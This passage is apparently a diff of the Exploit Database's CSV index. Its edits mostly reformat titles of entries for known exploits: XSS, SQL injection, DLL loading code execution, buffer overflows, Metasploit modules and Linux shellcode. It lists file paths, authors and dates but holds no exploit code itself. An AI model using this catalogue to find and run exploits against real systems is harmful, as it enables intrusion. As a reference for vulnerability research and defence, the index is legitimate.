+34468,platforms/php/webapps/34468.html,"Mystic 0.1.4 - Multiple Cross Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34469,platforms/php/webapps/34469.html,"Onyx Multiple Cross Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34470,platforms/php/webapps/34470.txt,"Beex news.php navaction Parameter XSS",2009-09-01,Moudi,php,webapps,0 34471,platforms/php/webapps/34471.txt,"Beex partneralle.php navaction Parameter XSS",2009-09-01,Moudi,php,webapps,0 @@ -31058,7 +31058,7 @@ id,file,description,date,author,platform,type,port 34477,platforms/php/webapps/34477.txt,"Joomla! 'com_fireboard' Component 'Itemid' Parameter SQL Injection Vulnerability",2010-08-15,"ViRuS Qalaa",php,webapps,0 34478,platforms/windows/remote/34478.html,"Microsoft Internet Explorer 8 'toStaticHTML()' HTML Sanitization Bypass Weakness",2010-08-16,"Mario Heiderich",windows,remote,0 34479,platforms/php/webapps/34479.html,"CMSimple 3.3 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2010-08-16,"High-Tech Bridge SA",php,webapps,0 -34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b '.ogg' File Buffer Overflow Vulnerability",2010-08-16,"Praveen Darshanam",windows,dos,0 +34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' File Buffer Overflow Vulnerability",2010-08-16,"Praveen Darshanam",windows,dos,0 34481,platforms/php/webapps/34481.txt,"123 Flash Chat Multiple Security Vulnerabilities",2010-08-16,Lincoln,php,webapps,0 34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone 'questiondetail.php' Cross Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0 34483,platforms/php/webapps/34483.txt,"Nasim Guest Book 'page' Parameter Cross Site Scripting Vulnerability",2010-08-10,Moudi,php,webapps,0 @@ -31083,7 +31083,7 @@ id,file,description,date,author,platform,type,port 34505,platforms/php/webapps/34505.txt,"MySQL <= 5.1.48 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability",2010-08-19,"Boris Reisig",php,webapps,0 34506,platforms/linux/dos/34506.txt,"MySQL <= 5.1.48 'EXPLAIN' Denial Of Service Vulnerability",2010-08-20,"Bjorn Munch",linux,dos,0 34507,platforms/linux/remote/34507.txt,"Nagios XI 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 -34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 +34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 34510,platforms/linux/dos/34510.txt,"OraclMySQL <= 5.1.48 'LOAD DATA INFILE' Denial Of Service Vulnerability",2010-08-20,"Elena Stepanova",linux,dos,0 34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 @@ -31093,8 +31093,8 @@ id,file,description,date,author,platform,type,port 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 34520,platforms/linux/dos/34520.txt,"Oracle MySQL <= 5.1.48 'HANDLER' interface Denial Of Service Vulnerability",2010-08-20,"Matthias Leich",linux,dos,0 -34521,platforms/linux/dos/34521.txt,"Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0 -34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0 +34521,platforms/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0 +34522,platforms/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0 34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 @@ -31103,10 +31103,10 @@ id,file,description,date,author,platform,type,port 34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0 34530,platforms/windows/dos/34530.py,"Crystal Player v1.98 '.mls' File Buffer Overflow Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0 34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 Cross Site Scripting Vulnerability",2010-08-25,"Aung Khant",php,webapps,0 -34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0 -34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 'autocms.php' Cross-Site Scripting Vulnerability",2010-08-23,"High-Tech Bridge SA",php,webapps,0 +34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0 +34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 - 'autocms.php' Cross-Site Scripting Vulnerability",2010-08-23,"High-Tech Bridge SA",php,webapps,0 34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 -34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 +34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80 @@ -31126,7 +31126,7 @@ id,file,description,date,author,platform,type,port 34552,platforms/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory Vulnerability",2014-09-07,Breaking.Technology,php,webapps,0 34553,platforms/php/webapps/34553.txt,"Wordpress Like Dislike Counter 1.2.3 Plugin - SQL Injection Vulnerability",2014-09-07,Att4ck3r.ir,php,webapps,0 34555,platforms/php/webapps/34555.txt,"PhpOnlineChat 3.0 - XSS",2014-09-07,"N0 Feel",php,webapps,0 -34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 +34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34559,platforms/php/webapps/34559.txt,"Rumba XML 2.4 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34560,platforms/php/webapps/34560.html,"ArtGK CMS Cross Site Scripting and HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34561,platforms/php/webapps/34561.txt,"KingCMS 0.6 'CONFIG[AdminPath]' Parameter Remote File Include Vulnerability",2009-09-07,Securitylab.ir,php,webapps,0 @@ -31151,7 +31151,7 @@ id,file,description,date,author,platform,type,port 34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0 34593,platforms/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps,0 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020 -34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80 +34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80 34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0 34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross Site Scripting Vulnerability",2010-09-10,Moudi,php,webapps,0 34598,platforms/php/webapps/34598.txt,"SZNews 2.7 'printnews.php3' Remote File Include Vulnerability",2009-09-11,"kurdish hackers team",php,webapps,0 @@ -31183,7 +31183,7 @@ id,file,description,date,author,platform,type,port 34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 'search' Parameter Cross-Site Scripting Vulnerability",2010-09-06,"High-Tech Bridge SA",php,webapps,0 34629,platforms/php/webapps/34629.txt,"AContent 1.0 Cross Site Scripting and HTML Injection Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0 34630,platforms/php/webapps/34630.txt,"AChecker 1.0 'uri' Parameter Cross-Site Scripting Vulnerability",2010-09-15,"High-Tech Bridge SA",php,webapps,0 -34631,platforms/php/webapps/34631.txt,"ATutor 1.0 Multiple 'cid' Parameter Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0 +34631,platforms/php/webapps/34631.txt,"ATutor 1.0 - Multiple 'cid' Parameter Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0 34632,platforms/php/webapps/34632.txt,"Multi Website 1.5 'search' Parameter HTML Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0 34633,platforms/php/webapps/34633.txt,"Spiceworks 'query' Parameter Cross Site Scripting Vulnerability",2009-08-08,"Adam Baldwin",php,webapps,0 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0 @@ -31202,9 +31202,9 @@ id,file,description,date,author,platform,type,port 34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0 34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0 -34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0 +34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 - Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0 34652,platforms/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 'login.php' Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0 -34653,platforms/php/webapps/34653.txt,"e107 0.7.23 Multiple SQL Injection Vulnerabilities",2010-09-17,"High-Tech Bridge SA",php,webapps,0 +34653,platforms/php/webapps/34653.txt,"e107 0.7.23 - Multiple SQL Injection Vulnerabilities",2010-09-17,"High-Tech Bridge SA",php,webapps,0 34654,platforms/windows/remote/34654.c,"SWiSH Max3 DLL Loading Arbitrary Code Execution Vulnerability",2010-09-20,anT!-Tr0J4n,windows,remote,0 34655,platforms/php/webapps/34655.txt,"Open Classifieds Multiple Cross Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0 34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 includes/video_ad.php pic_id Parameter XSS",2009-08-29,Moudi,php,webapps,0 @@ -31239,17 +31239,17 @@ id,file,description,date,author,platform,type,port 34686,platforms/windows/remote/34686.txt,"YelloSoft Pinky 1.0 Directory Traversal Vulnerability",2010-09-16,"John Leitch",windows,remote,0 34687,platforms/asp/webapps/34687.txt,"Smart ASP Survey 'catid' SQL Injection Vulnerability",2009-08-27,Moudi,asp,webapps,0 34688,platforms/php/webapps/34688.txt,"Basilic 1.5.13 'index.php' Cross Site Scripting Vulnerability",2009-07-27,PLATEN,php,webapps,0 -34689,platforms/php/webapps/34689.txt,"Smart Magician Blog 1.0 Multiple SQL Injection Vulnerabilities",2009-08-27,Evil-Cod3r,php,webapps,0 +34689,platforms/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injection Vulnerabilities",2009-08-27,Evil-Cod3r,php,webapps,0 34690,platforms/php/webapps/34690.txt,"@Mail <= 6.1.9 'MailType' Parameter Cross Site Scripting Vulnerability",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0 34691,platforms/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser HTML Injection Vulnerability",2010-09-21,"Sumit Kumar Soni",multiple,remote,0 34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross Site Scripting Vulnerability",2009-07-27,u.f.,php,webapps,0 34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 'search' Field Cross Site Scripting Vulnerability",2009-08-27,"599eme Man",php,webapps,0 -34694,platforms/php/webapps/34694.txt,"ClipBucket 1.7.1 Multiple SQL Injection Vulnerabilities",2009-07-24,Qabandi,php,webapps,0 +34694,platforms/php/webapps/34694.txt,"ClipBucket 1.7.1 - Multiple SQL Injection Vulnerabilities",2009-07-24,Qabandi,php,webapps,0 34695,platforms/windows/remote/34695.c,"GreenBrowser - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-22,anT!-Tr0J4n,windows,remote,0 34696,platforms/windows/remote/34696.c,"Easy Office Recovery 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-22,anT!-Tr0J4n,windows,remote,0 34697,platforms/windows/remote/34697.c,"Sothink SWF Decompiler 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-22,anT!-Tr0J4n,windows,remote,0 34698,platforms/windows/dos/34698.txt,"Microsoft Excel 2002 - Memory Corruption Vulnerability",2010-09-23,Abysssec,windows,dos,0 -34699,platforms/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 Multiple Cross Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",php,webapps,0 +34699,platforms/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 - Multiple Cross Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",php,webapps,0 34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s 'index.php' Local File Include and Cross Site Scripting Vulnerabilities",2009-07-24,u.f.,php,webapps,0 34701,platforms/php/webapps/34701.txt,"SkaLinks 1.5 'cat' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps,0 34702,platforms/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 'faqs.php' Cross Site Scripting Vulnerability",2009-07-24,Moudi,php,webapps,0 @@ -31268,7 +31268,7 @@ id,file,description,date,author,platform,type,port 34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0 34717,platforms/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,php,webapps,0 34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0 -34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0 +34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash PoC",2014-09-20,"niko sec",windows,dos,0 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0 34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0 34729,platforms/windows/dos/34729.py,"Seafile-server <= 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0 @@ -31323,19 +31323,19 @@ id,file,description,date,author,platform,type,port 34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 'car' Parameter SQL Injection Vulnerability",2010-09-27,RoAd_KiLlEr,php,webapps,0 34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll 'demo_page.php' Cross Site Scripting Vulnerability",2009-07-16,Moudi,php,webapps,0 -34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 'name' Field HTML Injection Vulnerability",2010-09-28,"Veerendra G.G",php,webapps,0 -34785,platforms/php/webapps/34785.txt,"phpMyFAQ 2.6.x 'index.php' Cross Site Scripting Vulnerability",2010-09-28,"Yam Mesicka",php,webapps,0 +34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' Field HTML Injection Vulnerability",2010-09-28,"Veerendra G.G",php,webapps,0 +34785,platforms/php/webapps/34785.txt,"phpMyFAQ 2.6.x - 'index.php' Cross Site Scripting Vulnerability",2010-09-28,"Yam Mesicka",php,webapps,0 34786,platforms/php/webapps/34786.txt,"eCardMAX Multiple Cross Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0 -34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl manager/index.php modahsh Parameter XSS",2010-09-29,"John Leitch",php,webapps,0 +34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter XSS",2010-09-29,"John Leitch",php,webapps,0 34788,platforms/php/webapps/34788.txt,"MODx manager/controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 -34789,platforms/php/webapps/34789.html,"GetSimple CMS 2.01 'admin/changedata.php' Cross Site Scripting Vulnerability",2010-09-29,"High-Tech Bridge SA",php,webapps,0 +34789,platforms/php/webapps/34789.html,"GetSimple CMS 2.01 - 'admin/changedata.php' Cross Site Scripting Vulnerability",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 'cont1' Parameter HTML Injection Vulnerability",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34791,platforms/php/webapps/34791.txt,"Swinger Club Portal start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34792,platforms/php/webapps/34792.txt,"Swinger Club Portal start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0 34793,platforms/php/webapps/34793.txt,"Top Paidmailer 'home.php' Remote File Include Vulnerability",2009-07-13,Moudi,php,webapps,0 34794,platforms/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",cgi,webapps,0 34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script 'index.php' Cross Site Scripting Vulnerability",2009-07-09,Vrs-hCk,php,webapps,0 -34796,platforms/multiple/remote/34796.txt,"Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0 +34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0 34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0 34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability²",2010-10-04,"Eugene Salov",php,webapps,0 34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0 @@ -31359,7 +31359,7 @@ id,file,description,date,author,platform,type,port 34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component 'cm_id' Parameter SQL Injection Vulnerability",2010-10-06,FL0RiX,php,webapps,0 34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite Vulnerability",2009-09-15,the_Edit0r,windows,remote,0 34822,platforms/windows/local/34822.c,"Microsoft Windows Local Procedure Call (LPC) Local Privilege Escalation Vulnerability",2010-09-07,yuange,windows,local,0 -34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-08,anT!-Tr0J4n,windows,remote,0 +34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 - 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-08,anT!-Tr0J4n,windows,remote,0 34824,platforms/php/webapps/34824.txt,"Lantern CMS '11-login.asp' Cross Site Scripting Vulnerability",2010-10-08,"High-Tech Bridge SA",php,webapps,0 34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 Templates HTML Injection Vulnerability",2009-06-22,lorddemon,php,webapps,0 34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 'title.php' Cross Site Scripting Vulnerability",2010-10-08,"Anatolia Security",php,webapps,0 @@ -31375,16 +31375,16 @@ id,file,description,date,author,platform,type,port 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0 34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0 -34839,platforms/cgi/webapps/34839.py,"IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit",2014-10-01,"Claudio Viviani",cgi,webapps,0 -34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 -34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 +34839,platforms/cgi/webapps/34839.py,"IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection Exploit",2014-10-01,"Claudio Viviani",cgi,webapps,0 +34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 +34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 34843,platforms/php/webapps/34843.txt,"TWiki <= 5.0 bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 34844,platforms/windows/remote/34844.c,"STDU Explorer 1.0.201 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-15,anT!-Tr0J4n,windows,remote,0 34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F 'page' Parameter Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0 34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 dot Character Remote File Disclosure Vulnerability",2009-10-09,Dr_IDE,windows,remote,0 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R 'subitems.php' Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0 -34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 +34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80 @@ -31424,7 +31424,7 @@ id,file,description,date,author,platform,type,port 34887,platforms/php/webapps/34887.txt,"JCE-Tech PHP Video Script 'index.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0 34888,platforms/php/webapps/34888.txt,"UloKI PHP Forum 2.1 'search.php' Cross Site Scripting Vulnerability",2009-08-19,Moudi,php,webapps,0 34889,platforms/windows/dos/34889.vcf,"Microsoft Windows Mobile Overly Long vCard Name Field Denial of Service Vulnerability",2010-10-21,SecurityArchitect.Org,windows,dos,0 -34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0 +34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0 34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 'name' Parameter HTML Injection Vulnerability",2010-10-21,"SecPod Research",php,webapps,0 34892,platforms/php/webapps/34892.txt,"pecio cms 2.0.5 'target' Parameter Cross Site Scripting Vulnerability",2010-10-21,"Antu Sanadi",php,webapps,0 34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0 @@ -31453,7 +31453,7 @@ id,file,description,date,author,platform,type,port 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 -34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 +34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0 34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer Remote Command Execution",2014-10-09,metasploit,windows,remote,80 @@ -31463,7 +31463,7 @@ id,file,description,date,author,platform,type,port 34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 'default.aspx' Cross Site Scripting Vulnerability",2009-06-03,intern0t,php,webapps,0 34931,platforms/windows/remote/34931.c,"Microsoft Windows VISTA 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-25,"Tyler Borland",windows,remote,0 34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0 -34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 +34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 - Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0 34935,platforms/php/webapps/34935.txt,"LES PACKS 'ID' Parameter SQL Injection Vulnerability",2010-10-27,Cru3l.b0y,php,webapps,0 34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 'streamfile.asp' Multiple Directory Traversal 